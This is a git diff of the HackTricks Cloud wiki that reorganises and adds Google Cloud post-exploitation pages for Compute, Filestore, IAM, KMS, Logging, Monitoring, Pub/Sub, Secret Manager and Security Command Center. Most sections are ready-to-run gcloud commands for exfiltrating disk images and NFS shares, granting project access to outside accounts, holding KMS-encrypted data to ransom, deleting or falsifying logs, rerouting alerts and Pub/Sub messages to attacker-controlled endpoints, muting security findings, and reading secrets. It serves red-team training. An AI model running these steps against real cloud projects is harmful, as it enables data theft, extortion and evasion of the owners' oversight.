 ```
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md
similarity index 52%
rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md
rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md
index 95ba0b1c6..9ef2e128a 100644
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md
@@ -1,27 +1,14 @@
 # GCP - Compute Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Compute
 
 For more information about Compute and VPC (Networking) check:
 
-{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %}
-[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-compute-instances-enum/
+{{#endref}}
 
 ### Export & Inspect Images locally
 
@@ -29,31 +16,28 @@ This would allow an attacker to **access the data contained inside already exist
 
 It's possible to export a VM image to a bucket and then download it and mount it locally with the command:
 
-{% code overflow="wrap" %}
 ```bash
 gcloud compute images export --destination-uri gs:///image.vmdk --image imagetest --export-format vmdk
 # The download the export from the bucket and mount it locally
 ```
-{% endcode %}
 
 Fore performing this action the attacker might need privileges over the storage bucket and for sure **privileges over cloudbuild** as it's the **service** which is going to be asked to perform the export\
 Moreover, for this to work the codebuild SA and the compute SA needs privileged permissions.\
 The cloudbuild SA `@cloudbuild.gserviceaccount.com` needs:
 
-* roles/iam.serviceAccountTokenCreator
-* roles/compute.admin
-* roles/iam.serviceAccountUser
+- roles/iam.serviceAccountTokenCreator
+- roles/compute.admin
+- roles/iam.serviceAccountUser
 
 And the SA `-compute@developer.gserviceaccount.com` needs:
 
-* oles/compute.storageAdmin
-* roles/storage.objectAdmin
+- oles/compute.storageAdmin
+- roles/storage.objectAdmin
 
 ### Export & Inspect Snapshots & Disks locally
 
 It's not possible to directly export snapshots and disks, but it's possible to **transform a snapshot in a disk, a disk in an image** and following the **previous section**, export that image to inspect it locally
 
-{% code overflow="wrap" %}
 ```bash
 # Create a Disk from a snapshot
 gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]
@@ -61,7 +45,6 @@ gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --
 # Create an image from a disk
 gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]
 ```
-{% endcode %}
 
 ### Inspect an Image creating a VM
 
@@ -116,32 +99,22 @@ Mount the disk inside the VM:
     ```sh
     gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
     ```
-2. **Identify the Disk**: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as `/dev/sdb`, `/dev/sdc`, etc.
-3. **Format and Mount the Disk** (if it's a new or raw disk):
-   *   Create a mount point:
 
-       ```sh
-       sudo mkdir -p /mnt/disks/[MOUNT_DIR]
-       ```
-   *   Mount the disk:
+2.  **Identify the Disk**: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as `/dev/sdb`, `/dev/sdc`, etc.
+3.  **Format and Mount the Disk** (if it's a new or raw disk):
 
-       ```sh
-       sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
-       ```
+    - Create a mount point:
+
+      ```sh
+      sudo mkdir -p /mnt/disks/[MOUNT_DIR]
+      ```
+
+    - Mount the disk:
+
+      ```sh
+      sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]
+      ```
 
 If you **cannot give access to a external project** to the snapshot or disk, you might need to p**erform these actions inside an instance in the same project as the snapshot/disk**.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md
new file mode 100644
index 000000000..7300de2e5
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md
@@ -0,0 +1,100 @@
+# GCP - Filestore Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Filestore
+
+For more information about Filestore check:
+
+{{#ref}}
+../gcp-services/gcp-filestore-enum.md
+{{#endref}}
+
+### Mount Filestore
+
+A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**:
+
+```bash
+sudo apt-get update
+sudo apt-get install nfs-common
+# Check the share name
+showmount -e 
+# Mount the share
+mkdir /mnt/fs
+sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
+```
+
+To find the IP address of a filestore insatnce check the enumeration section of the page:
+
+{{#ref}}
+../gcp-services/gcp-filestore-enum.md
+{{#endref}}
+
+### Remove Restrictions and get extra permissions
+
+If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. It's also possible to grant more privileges over your IP address to have admin access over the share:
+
+```bash
+gcloud filestore instances update nfstest \
+    --zone= \
+    --flags-file=nfs.json
+
+# Contents of nfs.json
+{
+  "--file-share":
+  {
+    "capacity": "1024",
+    "name": "",
+    "nfs-export-options": [
+      {
+        "access-mode": "READ_WRITE",
+        "ip-ranges": [
+          "/32"
+        ],
+        "squash-mode": "NO_ROOT_SQUASH",
+        "anon_uid": 1003,
+        "anon_gid": 1003
+      }
+    ]
+  }
+}
+```
+
+### Restore a backup
+
+If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:**
+
+```bash
+# Create a new filestore if you don't want to modify the old one
+gcloud filestore instances create  \
+    --zone= \
+    --tier=STANDARD \
+    --file-share=name=vol1,capacity=1TB \
+    --network=name=default,reserved-ip-range=10.0.0.0/29
+
+# Restore a backups in a new instance
+gcloud filestore instances restore  \
+    --zone= \
+    --file-share= \
+    --source-backup= \
+    --source-backup-region=
+
+# Follow the previous section commands to mount it
+```
+
+### Create a backup and restore it
+
+If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned:
+
+```bash
+# Create share backup
+gcloud filestore backups create  \
+    --region= \
+    --instance= \
+    --instance-zone= \
+    --file-share=
+
+# Follow the previous section commands to restore it and mount it
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md
new file mode 100644
index 000000000..eadadc6f6
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md
@@ -0,0 +1,29 @@
+# GCP - IAM Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## IAM 
+
+You can find further information about IAM in:
+
+{{#ref}}
+../gcp-services/gcp-iam-and-org-policies-enum.md
+{{#endref}}
+
+### Granting access to management console 
+
+Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
+
+To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor.
+
+You can use the following command to **grant a user the primitive role of Editor** to your existing project:
+
+```bash
+gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor
+```
+
+If you succeeded here, try **accessing the web interface** and exploring from there.
+
+This is the **highest level you can assign using the gcloud tool**.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md
similarity index 72%
rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md
rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md
index fb4c0cdd1..fbfbf734a 100644
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md
@@ -1,27 +1,14 @@
 # GCP - KMS Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## KMS
 
 Find basic information about KMS in:
 
-{% content-ref url="../gcp-services/gcp-kms-enum.md" %}
-[gcp-kms-enum.md](../gcp-services/gcp-kms-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-kms-enum.md
+{{#endref}}
 
 ### `cloudkms.cryptoKeyVersions.destroy`
 
@@ -78,18 +65,16 @@ In AWS it's possible to completely **steal a KMS key** by modifying the KMS reso
 
 However, there is another way to perform a global KMS Ransomware, which would involve the following steps:
 
-* Create a new **version of the key with a key material** imported by the attacker
+- Create a new **version of the key with a key material** imported by the attacker
 
-{% code overflow="wrap" %}
 ```bash
 gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_RING] --import-method [IMPORT_METHOD] --protection-level [PROTECTION_LEVEL] --target-key [KEY]
 ```
-{% endcode %}
 
-* Set it as **default version** (for future data being encrypted)
-* **Re-encrypt older data** encrypted with the previous version with the new one.
-* **Delete the KMS key**
-* Now only the attacker, who has the original key material could be able to decrypt the encrypted data
+- Set it as **default version** (for future data being encrypted)
+- **Re-encrypt older data** encrypted with the previous version with the new one.
+- **Delete the KMS key**
+- Now only the attacker, who has the original key material could be able to decrypt the encrypted data
 
 #### Here are the steps to import a new version and disable/delete the older data:
 
@@ -128,7 +113,7 @@ gcloud kms keys versions import \
     --location us-central1 \
     --keyring kms-lab-2-keyring \
     --key kms-lab-2-key \
-    --algorithm "google-symmetric-encryption" \ 
+    --algorithm "google-symmetric-encryption" \
     --target-key-file my-key-material.bin
 
 # Get versions
@@ -269,17 +254,4 @@ verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key
 print('Verified:', verified)
 ```
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md
similarity index 55%
rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md
rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md
index 9217a9fad..c63578d82 100644
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md
@@ -1,33 +1,20 @@
 # GCP - Logging Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
 For more information check:
 
-{% content-ref url="../gcp-services/gcp-logging-enum.md" %}
-[gcp-logging-enum.md](../gcp-services/gcp-logging-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-logging-enum.md
+{{#endref}}
 
 For other ways to disrupt monitoring check:
 
-{% content-ref url="gcp-monitoring-post-exploitation.md" %}
-[gcp-monitoring-post-exploitation.md](gcp-monitoring-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-monitoring-post-exploitation.md
+{{#endref}}
 
 ### Default Logging
 
@@ -39,7 +26,6 @@ In [https://console.cloud.google.com/iam-admin/audit/allservices](https://consol
 
 ### Read logs - `logging.logEntries.list`
 
-{% code overflow="wrap" %}
 ```bash
 # Read logs
 gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json
@@ -49,35 +35,28 @@ gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=
 
 # Use these options to indicate a different bucket or view to use: --bucket=_Required  --view=_Default
 ```
-{% endcode %}
 
 ### `logging.logs.delete`
 
-{% code overflow="wrap" %}
 ```bash
 # Delete all entries from a log in the _Default log bucket - logging.logs.delete
 gcloud logging logs delete 
 ```
-{% endcode %}
 
 ### Write logs - `logging.logEntries.create`
 
-{% code overflow="wrap" %}
 ```bash
 # Write a log entry to try to disrupt some system
 gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
 ```
-{% endcode %}
 
 ### `logging.buckets.update`
 
-{% code overflow="wrap" %}
 ```bash
 # Set retention period to 1 day (_Required has a fixed one of 400days)
 
 gcloud logging buckets update bucketlog --location= --description="New description" --retention-days=1
 ```
-{% endcode %}
 
 ### `logging.buckets.delete`
 
@@ -88,12 +67,10 @@ gcloud logging buckets delete BUCKET_NAME --location=
 
 ### `logging.links.delete`
 
-{% code overflow="wrap" %}
 ```bash
 # Delete link
 gcloud logging links delete  --bucket  --location 
 ```
-{% endcode %}
 
 ### `logging.views.delete`
 
@@ -104,21 +81,17 @@ gcloud logging views delete  --bucket= --location=global
 
 ### `logging.views.update`
 
-{% code overflow="wrap" %}
 ```bash
 # Update a logging view to hide data
 gcloud logging views update  --log-filter="resource.type=gce_instance" --bucket= --location=global --description="New description for the log view"
 ```
-{% endcode %}
 
 ### `logging.logMetrics.update`
 
-{% code overflow="wrap" %}
 ```bash
 # Update log based metrics - logging.logMetrics.update
 gcloud logging metrics update  --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID
 ```
-{% endcode %}
 
 ### `logging.logMetrics.delete`
 
@@ -136,7 +109,6 @@ gcloud logging sinks delete 
 
 ### `logging.sinks.update`
 
-{% code overflow="wrap" %}
 ```bash
 # Disable sink - logging.sinks.update
 gcloud logging sinks update  --disabled
@@ -145,7 +117,7 @@ gcloud logging sinks update  --disabled
 gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity new-destination 
+gcloud logging sinks update  new-destination
 
 # Change the service account to one withuot permissions to write in the destination - logging.sinks.update
 gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID
@@ -157,19 +129,5 @@ gcloud logging sinks update SINK_NAME --clear-exclusions
 gcloud logging sinks update SINK_NAME --use-partitioned-tables
 gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
 ```
-{% endcode %}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md
new file mode 100644
index 000000000..d8efaccd1
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md
@@ -0,0 +1,114 @@
+# GCP - Monitoring Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Monitoring
+
+Fore more information check:
+
+{{#ref}}
+../gcp-services/gcp-monitoring-enum.md
+{{#endref}}
+
+For other ways to disrupt logs check:
+
+{{#ref}}
+gcp-logging-post-exploitation.md
+{{#endref}}
+
+### `monitoring.alertPolicies.delete`
+
+Delete an alert policy:
+
+```bash
+gcloud alpha monitoring policies delete 
+```
+
+### `monitoring.alertPolicies.update`
+
+Disrupt an alert policy:
+
+```bash
+# Disable policy
+gcloud alpha monitoring policies update  --no-enabled
+
+# Remove all notification channels
+gcloud alpha monitoring policies update  --clear-notification-channels
+
+# Chnage notification channels
+gcloud alpha monitoring policies update  --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL
+
+# Modify alert conditions
+gcloud alpha monitoring policies update  --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }"
+# or use --policy-from-file 
+```
+
+### `monitoring.dashboards.update`
+
+Modify a dashboard to disrupt it:
+
+```bash
+# Disrupt dashboard
+gcloud monitoring dashboards update  --config='''
+  displayName: New Dashboard with New Display Name
+  etag: 40d1040034db4e5a9dee931ec1b12c0d
+  gridLayout:
+    widgets:
+    - text:
+        content: Hello World
+  '''
+```
+
+### `monitoring.dashboards.delete`
+
+Delete a dashboard:
+
+```bash
+# Delete dashboard
+gcloud monitoring dashboards delete 
+```
+
+### `monitoring.snoozes.create`
+
+Prevent policies from generating alerts by creating a snoozer:
+
+```bash
+# Stop alerts by creating a snoozer
+gcloud monitoring snoozes create --display-name="Maintenance Week" \
+    --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \
+    --start-time="2023-03-01T03:00:00.0-0500" \
+    --end-time="2023-03-07T23:59:59.5-0500"
+```
+
+### `monitoring.snoozes.update`
+
+Update the timing of a snoozer to prevent alerts from being created when the attacker is interested:
+
+```bash
+# Modify the timing of a snooze
+gcloud monitoring snoozes update  --start-time=START_TIME --end-time=END_TIME
+
+# odify everything, including affected policies
+gcloud monitoring snoozes update  --snooze-from-file=
+```
+
+### `monitoring.notificationChannels.delete`
+
+Delete a configured channel:
+
+```bash
+# Delete channel
+gcloud alpha monitoring channels delete 
+```
+
+### `monitoring.notificationChannels.update`
+
+Update labels of a channel to disrupt it:
+
+```bash
+# Delete or update labels, for example email channels have the email indicated here
+gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
+gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md
similarity index 56%
rename from pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md
rename to src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md
index ea3325a93..62f11337f 100644
--- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md
@@ -1,27 +1,14 @@
 # GCP - Pub/Sub Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Pub/Sub
 
 For more information about Pub/Sub check the following page:
 
-{% content-ref url="../gcp-services/gcp-pub-sub.md" %}
-[gcp-pub-sub.md](../gcp-services/gcp-pub-sub.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-pub-sub.md
+{{#endref}}
 
 ### `pubsub.topics.publish`
 
@@ -61,12 +48,10 @@ Give yourself permission to perform any of the previous attacks.
 
 Get all the messages in a web server:
 
-{% code overflow="wrap" %}
 ```bash
 # Crete push subscription and recieve all the messages instantly in your web server
 gcloud pubsub subscriptions create  --topic  --push-endpoint https://
 ```
-{% endcode %}
 
 Create a subscription and use it to **pull messages**:
 
@@ -91,11 +76,9 @@ gcloud pubsub subscriptions delete 
 
 Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.
 
-{% code overflow="wrap" %}
 ```bash
 gcloud pubsub subscriptions update --push-endpoint  
 ```
-{% endcode %}
 
 ### `pubsub.subscriptions.setIamPolicy`
 
@@ -106,25 +89,23 @@ Give yourself the permissions needed to perform any of the previously commented
 Attack a schema to a topic so the messages doesn't fulfil it and therefore the topic is disrupted.\
 If there aren't any schemas you might need to create one.
 
-{% code title="schema.json" %}
-```json
+```json:schema.json
 {
-    "namespace": "com.example",
-    "type": "record",
-    "name": "Person",
-    "fields": [
-        {
-            "name": "name",
-            "type": "string"
-        },
-        {
-            "name": "age",
-            "type": "int"
-        }
-    ]
+  "namespace": "com.example",
+  "type": "record",
+  "name": "Person",
+  "fields": [
+    {
+      "name": "name",
+      "type": "string"
+    },
+    {
+      "name": "age",
+      "type": "int"
+    }
+  ]
 }
 ```
-{% endcode %}
 
 ```bash
 # Attach new schema
@@ -156,17 +137,4 @@ gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
     --snapshot=YOUR_SNAPSHOT_NAME
 ```
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
new file mode 100644
index 000000000..e679b0261
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md
@@ -0,0 +1,22 @@
+# GCP - Secretmanager Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Secretmanager
+
+For more information about Secret Manager check:
+
+{{#ref}}
+../gcp-services/gcp-secrets-manager-enum.md
+{{#endref}}
+
+### `secretmanager.versions.access`
+
+This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
+
+```bash
+# Get clear-text of version 1 of secret: ""
+gcloud secrets versions access 1 --secret=""
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md
new file mode 100644
index 000000000..837f694ed
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md
@@ -0,0 +1,58 @@
+# GCP - Security Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Security
+
+For more information check:
+
+{{#ref}}
+../gcp-services/gcp-security-enum.md
+{{#endref}}
+
+### `securitycenter.muteconfigs.create`
+
+Prevent generation of findings that could detect an attacker by creating a `muteconfig`:
+
+```bash
+# Create Muteconfig
+gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
+```
+
+### `securitycenter.muteconfigs.update`
+
+Prevent generation of findings that could detect an attacker by updating a `muteconfig`:
+
+```bash
+# Update Muteconfig
+gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
+```
+
+### `securitycenter.findings.bulkMuteUpdate`
+
+Mute findings based on a filer:
+
+```bash
+# Mute based on a filter
+gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""
+```
+
+A muted finding won't appear in the SCC dashboard and reports.
+
+### `securitycenter.findings.setMute`
+
+Mute findings based on source, findings...
+
+```bash
+gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED
